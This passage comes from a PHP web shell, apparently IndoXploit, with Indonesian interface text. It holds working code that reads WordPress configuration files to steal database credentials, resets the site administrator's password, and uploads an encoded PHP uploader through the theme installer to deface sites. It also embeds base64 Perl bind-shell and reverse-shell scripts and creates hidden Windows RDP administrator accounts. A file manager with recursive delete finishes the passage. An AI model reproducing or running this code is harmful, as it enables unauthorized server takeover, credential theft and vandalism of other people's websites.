1433. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
1434. $www = "m.php";
1435. $fp5 = fopen($www,"w");
1436. fputs($fp5,$upload3);
1437. $post2 = array(
1438. "_wpnonce" => "$anu2",
1439. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
1440. "themezip" => "@$www",
1441. "install-theme-submit" => "Install Now",
1442. );
1443. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
1444. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1445. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1446. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1447. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1448. curl_setopt($ch, CURLOPT_POST, 1);
1449. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
1450. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1451. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1452. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1453. $data3 = curl_exec($ch);
1454. curl_close($ch);
1455. $y = date("Y");
1456. $m = date("m");
1457. $namafile = "id.php";
1458. $fpi = fopen($namafile,"w");
1459. fputs($fpi,$script);
1460. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
1461. curl_setopt($ch6, CURLOPT_POST, true);
1462. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
1463. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
1464. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
1465. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
1466. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
1467. $postResult = curl_exec($ch6);
1468. curl_close($ch6);
1469. $as = "$target/k.php";
1470. $bs = anucurl($as);
1471. if(preg_match("#$script#is", $bs)) {
1472. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
1473. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
1474. } else {
1475. echo "[-] <font color='red'>gagal mepes...</font><br>";
1476. echo "[!!] coba aja manual: <br>";
1477. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1478. echo "[+] username: <font color=lime>$user</font><br>";
1479. echo "[+] password: <font color=lime>$pass</font><br><br>";
1480. }
1481. mysql_close($conn);
1482. }
1483. }
1484. }
1485. } else {
1486. echo "<center><h1>WordPress Auto Deface</h1>
1487. <form method='post'>
1488. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
1489. <input type='text' name='script' height='10' size='50' placeholder='Hacked by IndoXploit' required><br>
1490. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
1491. </form>
1492. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
1493. </center>";
1494. }
1495. } elseif($_GET['do'] == 'auto_dwp2') {
1496. if($_POST['auto_deface_wp']) {
1497. function anucurl($sites) {
1498. $ch = curl_init($sites);
1499. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1500. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1501. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1502. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1503. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1504. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1505. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1506. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1507. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
1508. $data = curl_exec($ch);
1509. curl_close($ch);
1510. return $data;
1511. }
1512. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1513. $post = array(
1514. "log" => "$userr",
1515. "pwd" => "$pass",
1516. "rememberme" => "forever",
1517. "wp-submit" => "$wp_submit",
1518. "redirect_to" => "$web",
1519. "testcookie" => "1",
1520. );
1521. $ch = curl_init($cek);
1522. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1523. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1524. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1525. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1526. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1527. curl_setopt($ch, CURLOPT_POST, 1);
1528. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1529. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1530. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1531. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1532. $data = curl_exec($ch);
1533. curl_close($ch);
1534. return $data;
1535. }
1536. $link = explode("\r\n", $_POST['link']);
1537. $script = htmlspecialchars($_POST['script']);
1538. $user = "indoxploit";
1539. $pass = "indoxploit";
1540. $passx = md5($pass);
1541. foreach($link as $dir_config) {
1542. $config = anucurl($dir_config);
1543. $dbhost = ambilkata($config,"DB_HOST', '","'");
1544. $dbuser = ambilkata($config,"DB_USER', '","'");
1545. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1546. $dbname = ambilkata($config,"DB_NAME', '","'");
1547. $dbprefix = ambilkata($config,"table_prefix = '","'");
1548. $prefix = $dbprefix."users";
1549. $option = $dbprefix."options";
1550. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1551. $db = mysql_select_db($dbname);
1552. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1553. $result = mysql_fetch_array($q);
1554. $id = $result[ID];
1555. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1556. $result2 = mysql_fetch_array($q2);
1557. $target = $result2[option_value];
1558. if($target == '') {
1559. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
1560. } else {
1561. echo "[+] $target <br>";
1562. }
1563. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1564. if(!$conn OR !$db OR !$update) {
1565. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1566. mysql_close($conn);
1567. } else {
1568. $site = "$target/wp-login.php";
1569. $site2 = "$target/wp-admin/theme-install.php?upload";
1570. $b1 = anucurl($site2);
1571. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
1572. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
1573. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
1574. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
1575. $www = "m.php";
1576. $fp5 = fopen($www,"w");
1577. fputs($fp5,$upload3);
1578. $post2 = array(
1579. "_wpnonce" => "$anu2",
1580. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
1581. "themezip" => "@$www",
1582. "install-theme-submit" => "Install Now",
1583. );
1584. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
1585. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1586. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1587. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1588. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1589. curl_setopt($ch, CURLOPT_POST, 1);
1590. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
1591. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1592. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1593. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1594. $data3 = curl_exec($ch);
1595. curl_close($ch);
1596. $y = date("Y");
1597. $m = date("m");
1598. $namafile = "id.php";
1599. $fpi = fopen($namafile,"w");
1600. fputs($fpi,$script);
1601. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
1602. curl_setopt($ch6, CURLOPT_POST, true);
1603. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
1604. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
1605. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
1606. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
1607. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
1608. $postResult = curl_exec($ch6);
1609. curl_close($ch6);
1610. $as = "$target/k.php";
1611. $bs = anucurl($as);
1612. if(preg_match("#$script#is", $bs)) {
1613. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
1614. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
1615. } else {
1616. echo "[-] <font color='red'>gagal mepes...</font><br>";
1617. echo "[!!] coba aja manual: <br>";
1618. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1619. echo "[+] username: <font color=lime>$user</font><br>";
1620. echo "[+] password: <font color=lime>$pass</font><br><br>";
1621. }
1622. mysql_close($conn);
1623. }
1624. }
1625. } else {
1626. echo "<center><h1>WordPress Auto Deface V.2</h1>
1627. <form method='post'>
1628. Link Config: <br>
1629. <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
1630. <input type='text' name='script' height='10' size='50' placeholder='Hacked by IndoXploit' required><br>
1631. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
1632. </form></center>";
1633. }
1634. } elseif($_GET['do'] == 'network') {
1635. echo "<form method='post'>
1636. <u>Bind Port:</u> <br>
1637. PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
1638. <input type='submit' name='sub_bp' value='>>'>
1639. </form>
1640. <form method='post'>
1641. <u>Back Connect:</u> <br>
1642. Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
1643. PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
1644. <input type='submit' name='sub_bc' value='>>'>
1645. </form>";
1646. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1647. if(isset($_POST['sub_bp'])) {
1648. $f_bp = fopen("/tmp/bp.pl", "w");
1649. fwrite($f_bp, base64_decode($bind_port_p));
1650. fclose($f_bp);
1651.  
1652. $port = $_POST['port_bind'];
1653. $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
1654. sleep(1);
1655. echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
1656. unlink("/tmp/bp.pl");
1657. }
1658. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1659. if(isset($_POST['sub_bc'])) {
1660. $f_bc = fopen("/tmp/bc.pl", "w");
1661. fwrite($f_bc, base64_decode($bind_connect_p));
1662. fclose($f_bc);
1663.  
1664. $ipbc = $_POST['ip_bc'];
1665. $port = $_POST['port_bc'];
1666. $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
1667. sleep(1);
1668. echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
1669. unlink("/tmp/bc.pl");
1670. }
1671. }
1672. elseif($_GET['do'] == 'krdp_shell') {
1673. if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
1674. if($_POST['create']) {
1675. $user = htmlspecialchars($_POST['user']);
1676. $pass = htmlspecialchars($_POST['pass']);
1677. if(preg_match("/$user/", exe("net user"))) {
1678. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
1679. } else {
1680. $add_user = exe("net user $user $pass /add");
1681. $add_groups1 = exe("net localgroup Administrators $user /add");
1682. $add_groups2 = exe("net localgroup Administrator $user /add");
1683. $add_groups3 = exe("net localgroup Administrateur $user /add");
1684. echo "[ RDP ACCOUNT INFO ]<br>
1685. ------------------------------<br>
1686. IP: <font color=lime>".$ip."</font><br>
1687. Username: <font color=lime>$user</font><br>
1688. Password: <font color=lime>$pass</font><br>
1689. ------------------------------<br><br>
1690. [ STATUS ]<br>
1691. ------------------------------<br>
1692. ";
1693. if($add_user) {
1694. echo "[add user] -> <font color='lime'>Berhasil</font><br>";
1695. } else {
1696. echo "[add user] -> <font color='red'>Gagal</font><br>";
1697. }
1698. if($add_groups1) {
1699. echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
1700. } elseif($add_groups2) {
1701. echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
1702. } elseif($add_groups3) {
1703. echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
1704. } else {
1705. echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
1706. }
1707. echo "------------------------------<br>";
1708. }
1709. } elseif($_POST['s_opsi']) {
1710. $user = htmlspecialchars($_POST['r_user']);
1711. if($_POST['opsi'] == '1') {
1712. $cek = exe("net user $user");
1713. echo "Checking username <font color=lime>$user</font> ....... ";
1714. if(preg_match("/$user/", $cek)) {
1715. echo "[ <font color=lime>Sudah ada</font> ]<br>
1716. ------------------------------<br><br>
1717. <pre>$cek</pre>";
1718. } else {
1719. echo "[ <font color=red>belum ada</font> ]";
1720. }
1721. } elseif($_POST['opsi'] == '2') {
1722. $cek = exe("net user $user indoxploit");
1723. if(preg_match("/$user/", exe("net user"))) {
1724. echo "[change password: <font color=lime>indoxploit</font>] -> ";
1725. if($cek) {
1726. echo "<font color=lime>Berhasil</font>";
1727. } else {
1728. echo "<font color=red>Gagal</font>";
1729. }
1730. } else {
1731. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
1732. }
1733. } elseif($_POST['opsi'] == '3') {
1734. $cek = exe("net user $user /DELETE");
1735. if(preg_match("/$user/", exe("net user"))) {
1736. echo "[remove user: <font color=lime>$user</font>] -> ";
1737. if($cek) {
1738. echo "<font color=lime>Berhasil</font>";
1739. } else {
1740. echo "<font color=red>Gagal</font>";
1741. }
1742. } else {
1743. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
1744. }
1745. } else {
1746. //
1747. }
1748. } else {
1749. echo "-- Create RDP --<br>
1750. <form method='post'>
1751. <input type='text' name='user' placeholder='username' value='indoxploit' required>
1752. <input type='text' name='pass' placeholder='password' value='indoxploit' required>
1753. <input type='submit' name='create' value='>>'>
1754. </form>
1755. -- Option --<br>
1756. <form method='post'>
1757. <input type='text' name='r_user' placeholder='username' required>
1758. <select name='opsi'>
1759. <option value='1'>Cek Username</option>
1760. <option value='2'>Ubah Password</option>
1761. <option value='3'>Hapus Username</option>
1762. </select>
1763. <input type='submit' name='s_opsi' value='>>'>
1764. </form>
1765. ";
1766. }
1767. } else {
1768. echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
1769. }
1770. } elseif($_GET['act'] == 'newfile') {
1771. if($_POST['new_save_file']) {
1772. $newfile = htmlspecialchars($_POST['newfile']);
1773. $fopen = fopen($newfile, "a+");
1774. if($fopen) {
1775. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
1776. } else {
1777. $act = "<font color=red>permission denied</font>";
1778. }
1779. }
1780. echo $act;
1781. echo "<form method='post'>
1782. Filename: <input type='text' name='newfile' value='$dir/hacked.php' style='width: 450px;' height='10'>
1783. <input type='submit' name='new_save_file' value='Submit'>
1784. </form>";
1785. } elseif($_GET['act'] == 'newfolder') {
1786. if($_POST['new_save_folder']) {
1787. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
1788. if(!mkdir($new_folder)) {
1789. $act = "<font color=red>permission denied!</font>";
1790. } else {
1791. $act = "<script>window.location='?dir=".$dir."';</script>";
1792. }
1793. }
1794. echo $act;
1795. echo "<form method='post'>
1796. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
1797. <input type='submit' name='new_save_folder' value='Submit'>
1798. </form>";
1799. } elseif($_GET['act'] == 'rename_dir') {
1800. if($_POST['dir_rename']) {
1801. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
1802. if($dir_rename) {
1803. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
1804. } else {
1805. $act = "<font color=red>permission denied</font>";
1806. }
1807. echo "".$act."<br>";
1808. }
1809. echo "<form method='post'>
1810. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
1811. <input type='submit' name='dir_rename' value='rename'>
1812. </form>";
1813. } elseif($_GET['act'] == 'delete_dir') {
1814. if(is_dir($dir)) {
1815. if(is_writable($dir)) {
1816. @rmdir($dir);
1817. @exe("rm -rf $dir");
1818. @exe("rmdir /s /q $dir");
1819. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
1820. } else {
1821. $act = "<font color=red>could not remove ".basename($dir)."</font>";
1822. }
1823. }
1824. echo $act;
1825. } elseif($_GET['act'] == 'view') {
1826. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
1827. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
1828. } elseif($_GET['act'] == 'edit') {
1829. if($_POST['save']) {
1830. $save = file_put_contents($_GET['file'], $_POST['src']);
1831. if($save) {
1832. $act = "<font color=lime>Saved!</font>";
1833. } else {
1834. $act = "<font color=red>permission denied</font>";
1835. }
1836. echo "".$act."<br>";
1837. }
1838. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
1839. echo "<form method='post'>
1840. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
1841. <input type='submit' value='Save' name='save' style='width: 500px;'>
1842. </form>";
1843. } elseif($_GET['act'] == 'rename') {
1844. if($_POST['do_rename']) {
1845. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
1846. if($rename) {
1847. $act = "<script>window.location='?dir=".$dir."';</script>";
1848. } else {
1849. $act = "<font color=red>permission denied</font>";
1850. }
1851. echo "".$act."<br>";
1852. }
1853. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
1854. echo "<form method='post'>
1855. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
1856. <input type='submit' name='do_rename' value='rename'>
1857. </form>";
1858. }
1859. elseif($_GET['act'] == 'delete') {
1860. $delete = unlink($_GET['file']);
1861. if($delete) {
1862. $act = "<script>window.location='?dir=".$dir."';</script>";
1863. } else {
1864. $act = "<font color=red>permission denied</font>";
1865. }
1866. echo $act;
1867. } else {
1868. if(is_dir($dir) === true) {
1869. if(!is_readable($dir)) {
1870. echo "<font color=red>can't open directory. ( not readable )</font>";
1871. } else {
1872. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
1873. <tr>
1874. <th class="th_home"><center>Nama</center></th>
1875. <th class="th_home"><center>Tipe</center></th>
1876. <th class="th_home"><center>Ukuran</center></th>
1877. <th class="th_home"><center>Terakhir Di Edit</center></th>
1878. <th class="th_home"><center>Owner/Group</center></th>
1879. <th class="th_home"><center>Hak Akses</center></th>
1880. <th class="th_home"><center>Action</center></th>
1881. </tr>';
1882. $scandir = scandir($dir);
1883. foreach($scandir as $dirx) {
1884. $dtype = filetype("$dir/$dirx");
1885. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
1886. if(function_exists('posix_getpwuid')) {
1887. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
1888. $downer = $downer['name'];
1889. } else {
1890. //$downer = $uid;
1891. $downer = fileowner("$dir/$dirx");
1892. }
1893. if(function_exists('posix_getgrgid')) {
1894. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
1895. $dgrp = $dgrp['name'];
1896. } else {
1897. $dgrp = filegroup("$dir/$dirx");
1898. }
1899. if(!is_dir("$dir/$dirx")) continue;
1900. if($dirx === '..') {
1901. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
1902. } elseif($dirx === '.') {
1903. $href = "<a href='?dir=$dir'>$dirx</a>";
1904. } else {
1905. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
1906. }
1907. if($dirx === '.' || $dirx === '..') {
1908. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
1909. } else {
1910. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
1911. }
1912. echo "<tr>";
1913. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
1914. echo "<td class='td_home'><center>$dtype</center></td>";
1915. echo "<td class='td_home'><center>-</center></th></td>";
1916. echo "<td class='td_home'><center>$dtime</center></td>";
1917. echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
1918. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
1919. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
1920. echo "</tr>";
1921. }
1922. }
1923. } else {
1924. echo "<font color=red>can't open directory.</font>";
1925. }
1926. foreach($scandir as $file) {
1927. $ftype = filetype("$dir/$file");
1928. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
1929. $size = filesize("$dir/$file")/1024;
1930. $size = round($size,3);
1931. if(function_exists('posix_getpwuid')) {
1932. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
1933. $fowner = $fowner['name'];
1934. } else {
1935. //$downer = $uid;
1936. $fowner = fileowner("$dir/$file");
1937. }
1938. if(function_exists('posix_getgrgid')) {
1939. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
1940. $fgrp = $fgrp['name'];
1941. } else {
1942. $fgrp = filegroup("$dir/$file");
1943. }
1944. if($size > 1024) {
1945. $size = round($size/1024,2). 'MB';
1946. } else {
1947. $size = $size. 'KB';
1948. }
1949. if(!is_file("$dir/$file")) continue;
1950. echo "<tr>";
1951. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
1952. echo "<td class='td_home'><center>$ftype</center></td>";
1953. echo "<td class='td_home'><center>$size</center></td>";
1954. echo "<td class='td_home'><center>$ftime</center></td>";
1955. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
1956. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
